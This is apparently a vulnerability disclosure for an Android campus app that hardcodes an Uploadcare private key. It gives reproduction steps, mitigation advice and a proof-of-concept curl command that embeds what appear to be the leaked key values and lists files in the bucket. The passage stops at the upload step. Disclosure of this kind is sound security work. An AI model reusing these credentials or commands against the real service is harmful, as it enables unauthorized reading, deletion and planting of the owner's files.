Description

The Android application campusconnect.ucc version 14.3.5 hardcodes an Uploadcare private key in campusconnect/BuildConfig.java . An unauthenticated attacker who obtains this key can directly invoke the Uploadcare API to upload, list, download, and delete arbitrary files stored in the Uploadcare bucket. This may result in disclosure of sensitive information and permanent data loss. Additionally, an attacker could upload a malicious file to the Uploadcare service. If the affected website server subsequently downloads and processes that file, it could lead to remote code execution.

Step To Reproduce

  1. Decompile the APK using jadx
  2. Navigate to sources/campusconnect/BuildConfig.java and extract the hardcoded Uploadcare keys.

image.png

  1. View stored files: Use the extracted keys to list existing files in the Uploadcare bucket.
  2. Upload a file: Upload a test file (e.g., test.php). The response will return the file UUID.
  3. Delete a file: Use the file UUID obtained from the upload response or file list to delete a file.

Video Proof of Concept

poc_campusconnect_ucc.gif

The video demonstrates executing the three curl commands: listing existing files, uploading a test file (test.php), and deleting the uploaded file. The responses confirm successful API interactions, proving that the leaked private key allows unauthorized file operations on the Uploadcare storage.

Principle

The app hardcodes an Uploadcare private key (along with its corresponding public key). This key pair serves as a credential for authenticating with the Uploadcare API: the private key, combined with the public key, is used to generate an Authorization header for API requests. Anyone who obtains these keys can impersonate the legitimate application and directly invoke Uploadcare API endpoints, allowing them to list, upload, download, and delete arbitrary files stored in the project's bucket. If the server later downloads and processes an uploaded file, this could lead to remote code execution.

Mitigation

Remove the hardcoded Uploadcare private key from the application source code immediately. Rotate the compromised key pair in the Uploadcare dashboard to revoke the leaked credentials. Move all Uploadcare API interactions to a secure backend server that acts as a proxy, enforcing authentication and authorization. Store all secrets using environment variables or a dedicated secrets manager.

PoC

View stored files

curl -H "Accept: application/vnd.uploadcare-v0.6+json"      -H "Authorization: Uploadcare.Simple 00f6038c401a780fa3ea:71bc3dee7dd1e6280fe5"      "[<https://api.uploadcare.com/files/?limit=1>](<https://api.uploadcare.com/files/?limit=1>)"

Upload a file